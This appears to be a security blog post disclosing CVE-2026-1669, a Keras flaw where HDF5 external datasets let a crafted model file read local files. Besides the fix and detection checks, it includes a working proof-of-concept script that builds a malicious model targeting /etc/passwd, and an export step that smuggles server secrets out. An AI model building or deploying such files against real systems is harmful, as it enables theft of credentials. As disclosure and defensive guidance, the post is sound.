Feb 18, 2026 · 6 min read
Keras blindly trusted HDF5 'external datasets' when loading models. Attackers can craft a .keras file where the model weights are actually pointers to local files on the victim's machine. When loaded, the model reads your secrets into memory as tensors.
A high-severity Arbitrary File Read vulnerability in the Keras machine learning library allows attackers to exfiltrate sensitive local files (like /etc/passwd or AWS credentials) by embedding 'External Storage' links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.
We live in an era where 'pip install' and 'model.load()' are typed with reckless abandon. Developers treat machine learning models like static assets—big bags of floating-point numbers that magically detect cats or translate French. But under the hood, the standard formats for these models are complex, structured filesystems. Keras, the high-level API that powers a massive chunk of the deep learning ecosystem, relies heavily on HDF5 (Hierarchical Data Format version 5) for saving and loading these weights.
Here is the problem: HDF5 isn't just a container for numbers; it's a feature-rich legacy format that supports everything from compression to complex object linking. One of those features is 'External Storage'—a mechanism designed to keep file sizes down by pointing a dataset to an external file on the disk rather than embedding the data.
CVE-2026-1669 is the classic story of a feature becoming a bug. By failing to validate these external links, Keras turned every load_model() call into a potential arbitrary file read primitive. If you are a security researcher, this is the kind of logic flaw you dream about: no memory corruption, no race conditions, just a polite request to the operating system to hand over its secrets.
To understand this exploit, you have to understand how Keras uses h5py. When you save a model to .keras or .h5, Keras maps the neural network layers to HDF5 groups and the weights (kernels and biases) to HDF5 datasets. A dataset is usually a multidimensional array of numbers stored contiguously in the file.
However, the HDF5 specification allows a dataset to be 'contiguous', 'chunked', or 'external'. When a dataset is marked as external, the HDF5 header effectively says: "The data for this array isn't here. Go look in /etc/passwd at offset 0."
> [!NOTE]
> This is not a bug in HDF5 or h5py. It is a documented feature for scientists who want to reference massive raw data files without duplicating them. The vulnerability lies entirely in Keras blindly assuming that every dataset it encounters is internal and safe.
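To make the layer-to-group mapping concrete, here is a small sketch that saves a toy model's weights and walks the resulting HDF5 hierarchy. The exact group names depend on your Keras version; the groups-and-datasets structure is the point.

```python
import h5py
import keras

# Build a toy model and save only its weights (Keras 3 expects the
# ".weights.h5" suffix for HDF5 weight files).
model = keras.Sequential([keras.Input(shape=(3,)), keras.layers.Dense(4)])
model.save_weights("tiny.weights.h5")

# Layers appear as HDF5 groups; kernels and biases appear as datasets.
with h5py.File("tiny.weights.h5", "r") as f:
    f.visititems(lambda name, obj: print(type(obj).__name__.ljust(8), name))
```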
The Keras loading logic iterates through the HDF5 structure, sees a dataset, and asks h5py to read it into a NumPy array. h5py, being a dutiful library, sees the external flag, resolves the path, opens the file, and reads the bytes. Keras then wraps those bytes in a Tensor and hands them to your GPU. Congratulations, your SSH private key is now a bias vector in a Dense layer.
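Here is that transparency in isolation, without Keras: an HDF5 dataset that stores none of its own bytes and instead points at a local file. The file names are purely illustrative.

```python
import h5py

# A stand-in for a sensitive local file.
with open("secrets.txt", "wb") as fh:
    fh.write(b"hunter2\n" * 16)   # 128 bytes

# The dataset declares external storage as (path, offset, size) tuples.
with h5py.File("demo.h5", "w") as f:
    f.create_dataset("weights", shape=(128,), dtype="uint8",
                     external=[("secrets.txt", 0, 128)])

# An ordinary read transparently pulls the bytes out of secrets.txt.
with h5py.File("demo.h5", "r") as f:
    print(f["weights"][...].tobytes()[:16])   # b'hunter2\nhunter2\n'
```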
Let's look at the vulnerable code path in keras/src/saving/saving_lib.py (pre-3.13.2). The loader would recursively walk through the HDF5 groups. When it found a dataset, it simply accessed it. In Python's h5py, accessing a dataset behaves like reading an array—it triggers the I/O immediately.
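The pattern looked roughly like the following; this is a simplified illustration, not the actual Keras source.

```python
import h5py
import numpy as np

def load_weights_unsafely(path):
    """Illustrative stand-in for the pre-3.13.2 behavior: every dataset
    encountered in the file is read as-is, with no check on where the
    bytes actually come from."""
    weights = {}
    with h5py.File(path, "r") as f:
        def visit(name, obj):
            if isinstance(obj, h5py.Dataset):
                # obj[...] performs the read immediately; for an external
                # dataset, h5py opens the referenced local file and hands
                # back its contents as an ordinary array.
                weights[name] = np.asarray(obj[...])
        f.visititems(visit)
    return weights
```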
The fix, introduced in commit 8a37f9d, is a masterclass in 'better late than never.' The maintainers introduced a centralized verification step _verify_dataset that explicitly checks the .external attribute of the HDF5 dataset object before allowing any data to be read.
Here is the critical check, as it appears in the patched version:

```python
# patched version of _verify_dataset
def _verify_dataset(self, dataset):
    if not isinstance(dataset, h5py.Dataset):
        raise ValueError(f"Expected Dataset, got {type(dataset)}")
    # THE FIX: Explicitly ban external links
    if dataset.external:
        raise ValueError(
            "Not allowed: H5 file Dataset with external links: "
            f"{dataset.external}"
        )
    return dataset
```

They also removed the items() and values() methods from their H5WeightsStore class, forcing all access through __getitem__, which now includes this mandatory security check. It is a robust fix because it kills the vulnerability at the data-access layer rather than trying to sanitize paths or restrict filenames.
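That access-funneling idea generalizes to any code that wraps untrusted HDF5 files: route every read through one accessor that refuses external storage before any I/O happens. A minimal sketch of the pattern (a hypothetical wrapper, not Keras's actual H5WeightsStore):

```python
import h5py

class CheckedH5Store:
    """Hypothetical wrapper: all dataset reads go through __getitem__,
    which rejects external storage before touching any data."""

    def __init__(self, group):
        self._group = group

    def __getitem__(self, key):
        dataset = self._group[key]
        if not isinstance(dataset, h5py.Dataset):
            raise ValueError(f"Expected Dataset, got {type(dataset)}")
        if dataset.external:   # list of (path, offset, size), or None
            raise ValueError(
                f"Refusing dataset with external storage: {dataset.external}"
            )
        return dataset[...]    # safe: bytes live inside the .h5 file itself
```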
Exploiting this is trivial and requires no binary exploitation skills at all. We just need to create a valid HDF5 file that defines a dataset pointing to a sensitive file, which we can do with standard Python libraries.
Imagine an attacker uploads a model to a public repository claiming to be the new state-of-the-art 'LLM-finetuner'. Here is how they build the trap:
```python
import h5py

# Target file we want to steal
target_file = '/etc/passwd'
# Or on Windows: 'C:\\Windows\\win.ini'

print(f"[*] Crafting malicious model pointing to {target_file}...")

with h5py.File('suspicious_model.keras', 'w') as f:
    # Create a dummy group structure Keras expects
    layer_group = f.create_group('layers')
    dense_group = layer_group.create_group('dense_1')

    # Define the 'external' list: (filename, offset, size)
    # h5py.h5f.UNLIMITED allows reading the whole file
    external_link = [(target_file, 0, h5py.h5f.UNLIMITED)]

    # Create the dataset.
    # The shape must roughly match the file size or be large enough.
    # We use uint8 to read raw bytes.
    f.create_dataset('vars', shape=(2048,), dtype='uint8',
                     external=external_link)

print("[+] Malicious payload created.")
```

When the victim runs keras.models.load_model('suspicious_model.keras'), Keras will eventually throw an error because the file content (text) won't look like valid float32 weights for a neural network. However, by the time the error is thrown, the read has likely already occurred; a clever attacker can also map the file to a byte or string tensor that Keras might accept for certain metadata fields.
So the model reads /etc/passwd. How does the attacker get it? This is where the context matters. In a local attack, the data is just in memory. But consider a Machine Learning-as-a-Service (MLaaS) environment or a CI/CD pipeline.
The most dangerous scenario is a system that allows users to upload a model for fine-tuning or evaluation. The backend loads the model (reading the server's local secrets like AWS credentials from ~/.aws/credentials), and if the attacker can trigger a save or export of the model later, those 'external' bytes might be saved as 'internal' bytes in the new file, which the attacker then downloads.
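A rough sketch of that round trip, using plain h5py to stand in for the service's load and export steps (the file names here are illustrative, not part of any real service):

```python
import h5py

# 1. The service loads the attacker's model. Reading the external dataset
#    pulls the server-side secret into memory as ordinary array data.
with h5py.File('suspicious_model.keras', 'r') as f:
    leaked = f['vars'][:1024]

# 2. The service re-saves or exports the model. The leaked bytes are now
#    embedded *inside* the new file, which the attacker simply downloads.
with h5py.File('exported_model.keras', 'w') as out:
    out.create_dataset('layers/dense_1/vars', data=leaked)
```

At that point no further access to the victim machine is needed; the secret travels out inside what looks like a perfectly normal model artifact.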
The remediation is straightforward: Update Keras to version 3.13.2 immediately. This version contains the dataset.external check that neutralizes the attack vector entirely.
If you cannot update (perhaps you are stuck on a legacy stack), you must treat all .keras and .h5 files as untrusted binaries. Do not load them outside of a sandboxed environment. You can also manually inspect files before loading using the h5dump command-line utility:
```bash
# Check for external storage configuration
h5dump -H malicious.keras | grep "EXTERNAL_FILE"
```

If that grep returns anything, delete the file and burn the hard drive (metaphorically speaking). This vulnerability serves as a stark reminder that 'data' formats are often code in disguise.
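If you prefer a programmatic gate, for example in CI before any load_model() call, the same inspection can be done with h5py without reading any tensor data. A minimal sketch, with a hypothetical helper name:

```python
import h5py

def find_external_datasets(path):
    """Hypothetical pre-flight check: list every dataset in an HDF5/.keras
    file that uses external storage, without reading any of its data."""
    offenders = []
    with h5py.File(path, 'r') as f:
        def visit(name, obj):
            if isinstance(obj, h5py.Dataset) and obj.external:
                offenders.append((name, obj.external))
        f.visititems(visit)
    return offenders

offenders = find_external_datasets('suspicious_model.keras')
if offenders:
    raise SystemExit(f"Refusing to load: external storage found: {offenders}")
```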
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| Keras (Google) | >= 3.0.0, < 3.13.2 | 3.13.2 |

| Attribute | Detail |
|---|---|
| CWE ID | CWE-73 (External Control of File Name or Path) |
| CVSS v4.0 | 7.1 (High) |
| Attack Vector | Network / Local |
| EPSS Score | 0.00039 |
| Exploit Maturity | Proof of Concept (PoC) |
| Affected Component | keras.src.saving.saving_lib |
CWE-73 describes software that allows user input to control or influence paths or file names used in filesystem operations.